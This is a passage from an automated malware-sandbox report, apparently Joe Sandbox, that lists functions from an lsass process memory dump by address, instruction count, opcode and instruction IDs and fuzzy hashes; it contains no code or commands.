Instruction ID: c5bfdde0fd8ce3b935644f446c0e4bbdd16596de6dca23f64e3fb6bcfddd22e5
Opcode Fuzzy Hash: a7fe9d05c9189f85d80cb56ca6b8ce23041fd3f9fa34225cdfdd522976dd0128
Instruction Fuzzy Hash: 80019674E0861D8FEBA4EB48C894AE8B7B1FB69300F1042AAD40DD7391DE746980DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268AA1, Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

n_H, xrefs: 00007FFA36268C03

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: n_H
API String ID: 0-741502821
Opcode ID: be03404e60411f8e969d3452445f54e65a92574d43cdfba1bd842900a056ba3c
Instruction ID: f73b754c0fd29f137d44ec697b62e82c58ebf8c3d4afcf6ec618886770b98abf
Opcode Fuzzy Hash: be03404e60411f8e969d3452445f54e65a92574d43cdfba1bd842900a056ba3c
Instruction Fuzzy Hash: 83513AB0D0861D8FEB94DB98C855AFDBBB1EF69300F51913AD40DE3382DE7968419B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268B2C, Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

n_H, xrefs: 00007FFA36268C03

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: n_H
API String ID: 0-741502821
Opcode ID: dd56e5d2097d11adea895ca8b242e88e7d820d08f3f125fd2d52175fd943256a
Instruction ID: 9a7f7868c16c95c954946d951493396dd433b75c0328f98ab3425cc6c237ef1f
Opcode Fuzzy Hash: dd56e5d2097d11adea895ca8b242e88e7d820d08f3f125fd2d52175fd943256a
Instruction Fuzzy Hash: 3531F770D18A1D8EEBD4EB98D895AFCB7B1FF69300F51513AD40DE3282DE7968419B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36265936, Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

=, xrefs: 00007FFA362659E3

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: e6786d4e9f5f226f82fc520cc6a7dc935d492135f47a38275312520ed5662ceb
Instruction ID: 18f4860b92bac3776f519dde02ae3254be72a8b1296ed1613f1843447c1b31dd
Opcode Fuzzy Hash: e6786d4e9f5f226f82fc520cc6a7dc935d492135f47a38275312520ed5662ceb
Instruction Fuzzy Hash: C3316F70D0562A8FEB65DB14C840BE9B3B1FF9A310F10C6E6C00DA7385DB756A808F80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626A39E, Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

T\_H, xrefs: 00007FFA3626A3CF

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: T\_H
API String ID: 0-1168709636
Opcode ID: 5f7d7159c1d7a2a7f2097e991ed3e1639b13fd1da86c05fb26a154a011273519
Instruction ID: 5eb30b3ee515a8a4e13a635637bafa1b6d220e6afc487e0a679c98ba132a9c79
Opcode Fuzzy Hash: 5f7d7159c1d7a2a7f2097e991ed3e1639b13fd1da86c05fb26a154a011273519
Instruction Fuzzy Hash: D3211DB1E187198FEBA4DB6888557A8B6F1FB69300F4151FAD00DE3292DE756A808F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362603D8, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0564a91c5eb594bc3f6c7bf49eed4c19b528362f1ce933986768e0e83f8f5d16
Instruction ID: f725fb2cbef5f00d04a1fd7d67a9382a32cc5c804d9a58e22eabf8bb09c584bc
Opcode Fuzzy Hash: 0564a91c5eb594bc3f6c7bf49eed4c19b528362f1ce933986768e0e83f8f5d16
Instruction Fuzzy Hash: 3FD14E70D1865A8FEB98DB98C855BB8BBF1FF69700F1480B9D00EE7292CE756845DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36269801, Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa273aaf833003a74aaaf37c45607fc86cd50eba27753c8c82125a252522839b
Instruction ID: 484db98049da63ba8cacdb9e80c1720f89a726aea0144bf5db803d0f296d983f
Opcode Fuzzy Hash: aa273aaf833003a74aaaf37c45607fc86cd50eba27753c8c82125a252522839b
Instruction Fuzzy Hash: A8B15071D1865A8FEBA8DB98C855BB8BBF1FF69300F1480B9D00DD7292CE756884DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626E519, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54f196ef20363988c4d8cec7bb280f6b19b5a14c529c2c365867dd156548b2ae
Instruction ID: 976f4ad73b9a12b19819216fa629138280a4d2efccd59aba960145e1be844098
Opcode Fuzzy Hash: 54f196ef20363988c4d8cec7bb280f6b19b5a14c529c2c365867dd156548b2ae
Instruction Fuzzy Hash: 4A611A70D1861D8FEB90EBA8C855AECBBB1FF69300F50817AD04DE3292DE7568859B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626E390, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ae0656ad5e6fb7eaf7c3e65a09838f38ef1f2627a5abd78d7acd6e1d1956010
Instruction ID: 9076fcb88337f88d005a7a6113f487bcb0d0bbb459ff72be8e34551aa8a00e2d
Opcode Fuzzy Hash: 4ae0656ad5e6fb7eaf7c3e65a09838f38ef1f2627a5abd78d7acd6e1d1956010
Instruction Fuzzy Hash: 4A315633B0C7255DE2247BBDB8860E9B790EF81376B109637D28CC5052DA1134CE8BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626E3A8, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ec8799ab118eab28079a83785e45501aeca731e97bbd34abead808dc8e71c0
Instruction ID: 9fe29a2325ceb1b0bdda36b645bb8227e46b6798aacf537e65e1652605f7949e
Opcode Fuzzy Hash: a4ec8799ab118eab28079a83785e45501aeca731e97bbd34abead808dc8e71c0
Instruction Fuzzy Hash: EC314637B0C7295DE224BBADBC864E9B794EF8537AB105637D24CC5012DA52748A8BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626E3B0, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4ab8d93c46f6aeb22134229739f1194929c3557478bad9f801f36d5aea8411d
Instruction ID: 6e9939b074c3c0b470ada2a610062a7f995ae4c45e59dea797fa7d59e36bde2a
Opcode Fuzzy Hash: e4ab8d93c46f6aeb22134229739f1194929c3557478bad9f801f36d5aea8411d
Instruction Fuzzy Hash: AF316633B0C7285DE324BBADFC864EAB790EF8537AB105637D24CC5012DA51348E8BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626DA9D, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01358a30172bb31c3746e4d63e873d90f2f8f808ee736dd9ca9e204554746799
Instruction ID: baaeeed1ed76c3beceadc3a9c6a2ce0c7d356377aa8a33008b9ad5d2280ea440
Opcode Fuzzy Hash: 01358a30172bb31c3746e4d63e873d90f2f8f808ee736dd9ca9e204554746799
Instruction Fuzzy Hash: DD41FA70E0865D8FEB94EB98C895BADB7B1FB99305F1041B9D44DD7351CE35A881CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260F39, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a643c42d786c922576fb0dc1c0b3401346ec4f81ff6824ab7488d9883abe30af
Instruction ID: c9c2e0c791dd3e86c6962d3f86cd5873daf9d4f7f808bbd42269201a7fb3953e
Opcode Fuzzy Hash: a643c42d786c922576fb0dc1c0b3401346ec4f81ff6824ab7488d9883abe30af
Instruction Fuzzy Hash: 2F416B31D086498FEB90DB98C558AFC7BF0EF26300F51917AC40DE7292CFBA6954AB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626E3E0, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5963b37526cc9803051ec5c42d2c9d86c88d4ffd896bb7fe928751522fab1ad9
Instruction ID: ef01b2d2b2deee3d0ac7690cf622a4406b812b5a83ae99fdc941dbe4bd196a79
Opcode Fuzzy Hash: 5963b37526cc9803051ec5c42d2c9d86c88d4ffd896bb7fe928751522fab1ad9
Instruction Fuzzy Hash: BC210637B0C72859E228B7ADFCC64EAB794DBC537AB105677D24CC5401DA52748E8BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626FF81, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 977a8c8678697270c1ec8e8127a087218bd3c217efa72c83cf8a106cd95ef70c
Instruction ID: 6b6871b04da427b31017ec07f1b84835774b222ca6f518c46fa67041e2f7da0e
Opcode Fuzzy Hash: 977a8c8678697270c1ec8e8127a087218bd3c217efa72c83cf8a106cd95ef70c
Instruction Fuzzy Hash: A43179B1D0861A8FEF98DFA8D494AFDB7B1EF1A310F11503AD40DA22C2CE799944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260669, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c10994c90f1cdd5730d5110c239a21319bae81d2b09be95e1867bcfe23dc23b
Instruction ID: 7547328393bff8b9e0a77d7642dda3cc727d7925d69aa1320e244a088b86074e
Opcode Fuzzy Hash: 3c10994c90f1cdd5730d5110c239a21319bae81d2b09be95e1867bcfe23dc23b
Instruction Fuzzy Hash: D331C031D0C68D8FF7A59BA88859AB87FA0EF67300F0594B6E40DC7292DF695894E701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626E408, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 388718fdc480b9e19c958b620d800e12cc598af1490311538153bc8c14ca34ed
Instruction ID: 6ee069f5d65ec1344116c74718342fd879df856c616e627a668bef7ae9694af4
Opcode Fuzzy Hash: 388718fdc480b9e19c958b620d800e12cc598af1490311538153bc8c14ca34ed
Instruction Fuzzy Hash: 90210837B0C7285EE624B7ADFC8A4EAB794DFC537AB105577D24CC1001DE5574898BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626D9A5, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229a329261e24a2ff66ddeb8d17b488701fc5648eff048810c8d2f764f0e9662
Instruction ID: fb6d3e9906ee22a7da7bf802e919eb4f2bc9c2bc8f41839afd60903bafb23b61
Opcode Fuzzy Hash: 229a329261e24a2ff66ddeb8d17b488701fc5648eff048810c8d2f764f0e9662
Instruction Fuzzy Hash: 72314C70D1CA4D8FEBA4EFA8C4646B9BBB1EF6A304F115579D00DE3392CE7958418B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3627011F, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3db649ef40277c2df2090df52faa593245c51c4d5b28048f523bb2c3efc08cb
Instruction ID: 518363e525b0a6f35daa5bcc009360c0fb9f2b6cf704540aac493035498bb546
Opcode Fuzzy Hash: b3db649ef40277c2df2090df52faa593245c51c4d5b28048f523bb2c3efc08cb
Instruction Fuzzy Hash: AD1190B1D1864D8FEB50EF98D845AEDBBE0FF55314F00867AE80CD3292DB35A9558740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626077D, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c796173f3ad1e63dc2d66401b53349b9706b20b28e9371260ebed4bdab4169b
Instruction ID: d9806f63f36db48d08ed6e270c91e4bc740cba89ed5da7d2f4b5df9980f4bbf1
Opcode Fuzzy Hash: 7c796173f3ad1e63dc2d66401b53349b9706b20b28e9371260ebed4bdab4169b
Instruction Fuzzy Hash: 83114C71C4920A8AF7519F908944AFE77B0AF22301F019536D0199A3D2DFBE6649FF91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36261103, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c6193e6295d039d1f7c475b0f447c6dbc2f70c696d2a0736506c7e0f533cff
Instruction ID: 248f501ac1e990e54e2b3ba9c33d83c95c724ae411f4ceaa170d6e384665bf23
Opcode Fuzzy Hash: 41c6193e6295d039d1f7c475b0f447c6dbc2f70c696d2a0736506c7e0f533cff
Instruction Fuzzy Hash: AD11A13188E3C55FD7439B708C689E57FF4AF57210B0A40EBD489CB1A3D96D594AC722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36261383, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb6f9d7b1b06c04d7cfe8337b3ec09f177ff0f52dfef9393a3b502a911328e97
Instruction ID: 184eb22ac7617bd3ca319c2f3020fd1aa1504d7bb1f253ce6f0ab936af7f4751
Opcode Fuzzy Hash: eb6f9d7b1b06c04d7cfe8337b3ec09f177ff0f52dfef9393a3b502a911328e97
Instruction Fuzzy Hash: E0012436E0C2884FE781ABA89C089E93FB4EF23215F0900B7E54CC3293DD652414D752

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260EC0, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9d10513e471ae1f98a62a3ecc9081e7227ee8249662b5b83c4d7f802a17945
Instruction ID: ac4e58d4ebe2de7fa47096c34e87fe20be50e70c6eea60c856d8bc701e0ffec9
Opcode Fuzzy Hash: 0a9d10513e471ae1f98a62a3ecc9081e7227ee8249662b5b83c4d7f802a17945
Instruction Fuzzy Hash: B711172144E3C14FD3539BB04C656A07FB0AF07214F0A44EBD889CB1E3DA9D1859D762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362609B9, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f8e3e3aeb3aef855019659194ef9799517bfcd61242262d2688d93976052e2
Instruction ID: 527e246b0f1205cf83a88921093f08d84557bb0ec4fbcfd9db534e1910181df1
Opcode Fuzzy Hash: 40f8e3e3aeb3aef855019659194ef9799517bfcd61242262d2688d93976052e2
Instruction Fuzzy Hash: 8111EC30D4D24A8FFB519B94C904AFE7BB0AF26310F019176C109D23C2DFB86A44EB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36267DB1, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b962c4d66f79927e46da66a82f8de2ea456e09fe4972e0d4f173dea6253fd366
Instruction ID: 10e1c76d24cb6e8d2b62884f4dce09ddc9b6a0c7444e544624c821cb99ae6249
Opcode Fuzzy Hash: b962c4d66f79927e46da66a82f8de2ea456e09fe4972e0d4f173dea6253fd366
Instruction Fuzzy Hash: 90016271908A8C8FDF94DF28C889AA93FF0FF29300F0144A6E419C7261DB34D590CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626EA35, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3db3c9c462115a4b38c305a74ba6e7d87e8cd22526d00e5c726ccbe8dc3b3d3
Instruction ID: eacb71697fe695bfa1b68d872e1fd87882fe4c8aada9c1679788cae1a5144357
Opcode Fuzzy Hash: b3db3c9c462115a4b38c305a74ba6e7d87e8cd22526d00e5c726ccbe8dc3b3d3
Instruction Fuzzy Hash: 0C01FD70C1C7898FE794AFA48829AB93FE0FF66200F0550BAE40CC2282CE6859508742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268F69, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54b0c1a277d244a3cbf6426060db0fb502b4bc0df3fd17999ede50cd695f317
Instruction ID: a965c15fddc3f04f976a9d16bb24448e6362558e7c615d529542715f05a2fa6d
Opcode Fuzzy Hash: d54b0c1a277d244a3cbf6426060db0fb502b4bc0df3fd17999ede50cd695f317
Instruction Fuzzy Hash: B0014F7190868D8FDB91EF28C849AA93FF1FF2A310F4541A6E81CC7262DA78D554CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36267C29, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3c69455f25203f2db7fa96691328f049690207f096ebdf0945370053fa2740e
Instruction ID: 383e052cfa1540ec8f79c3981455fa443dcd0216300c29f5adcd4b3b2cc6cba3
Opcode Fuzzy Hash: c3c69455f25203f2db7fa96691328f049690207f096ebdf0945370053fa2740e
Instruction Fuzzy Hash: 63015E3080CA8D8FDB81EF588888A993FF0FF29300F0540A6E408C72A2DA75D554CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260E5F, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab89c57e65c9862493ec0190a2a79c7ae7a8ff60170690977d9e9b33b3ca59d3
Instruction ID: c67324653043a9346582329fd9fd84a488f419d7ae9c472ccf2010250a4911f5
Opcode Fuzzy Hash: ab89c57e65c9862493ec0190a2a79c7ae7a8ff60170690977d9e9b33b3ca59d3
Instruction Fuzzy Hash: CC01D370D1461E8FEB84EB94C958AACB7B1FF69300F41527AC40DE7296DFB86941EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268FD1, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 457021e96abcebd2e8bc3233218d5025b118fd3b164b4f356a2a615372763fa4
Instruction ID: 0253c1161a3a9b87dfc36d191a2a8235cb7a874453a0186a5878f1753e4bfa46
Opcode Fuzzy Hash: 457021e96abcebd2e8bc3233218d5025b118fd3b164b4f356a2a615372763fa4
Instruction Fuzzy Hash: 86F06D31C1C6898FEB949FA888496A87BA0EF26300F4551BAD80CC6292DEB99550DB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362613BD, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10bec3e4b8dd8a5acc8a9faea18d2b91572d73816f6e399a00de16df5c6d4bac
Instruction ID: 4f8f4fb8a9b75c10cc29ddbcd7d69c9b22b5371f74f1fbba5210ec97eba3be07
Opcode Fuzzy Hash: 10bec3e4b8dd8a5acc8a9faea18d2b91572d73816f6e399a00de16df5c6d4bac
Instruction Fuzzy Hash: 12F0A431D0C3C88FE7929F6888589A97FB4AF27204F0910A7E44CC7293DD756554D711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260D0F, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c1870fdb18a9f067066ea4b7c105e428c7b707625ae16375f3491058bfd11f
Instruction ID: d522f89a249d8bb2a659b1b30c1578e928983f79c1691e62b4fec9b7dd925138
Opcode Fuzzy Hash: a2c1870fdb18a9f067066ea4b7c105e428c7b707625ae16375f3491058bfd11f
Instruction Fuzzy Hash: 64014FB0E0860B8BEB98DB84C854ABE73B1FF56300F11823DC00AE3390CFB469049B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626E965, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc2ea605dfb1d78c0c2c6be6a4553c6945d894f8586c1302d837201767b3170e
Instruction ID: 1a3d685bd0088544538c190f83ac0baad448b2f94e1bccabc95836572e462d31
Opcode Fuzzy Hash: dc2ea605dfb1d78c0c2c6be6a4553c6945d894f8586c1302d837201767b3170e
Instruction Fuzzy Hash: 8DF0A431C0D689CFEBD5EF94881A6E97FD0EF26204F0485B6E44D822C3DE7954148742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260D57, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4cf1e58cd7a10a48c9b5e8a06b52e007078a50298c3ea7e5b4ffa280781c53d
Instruction ID: 267080609e83cc87b36bcda22ff407dfd2671ced888747ae3e61b12926a39513
Opcode Fuzzy Hash: b4cf1e58cd7a10a48c9b5e8a06b52e007078a50298c3ea7e5b4ffa280781c53d
Instruction Fuzzy Hash: DC01A870D4860A8BEB90DF94C944AFD77B1EF26310F115635D419E2391DFB5A540AB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268F80, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37b205b7865c1e0a7cebff4447499a981a33f8d5e20ccbc307205f48b249a00c
Instruction ID: a6365528992d6edfac37be40b071a899cd6ee100244eb0d41b7ec89a74c94858
Opcode Fuzzy Hash: 37b205b7865c1e0a7cebff4447499a981a33f8d5e20ccbc307205f48b249a00c
Instruction Fuzzy Hash: A5F0173090890DCFDF80EF68C848AAA7BE1FF28300F5045A6F81CC3261CA74E5A0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268E11, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.744087495.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

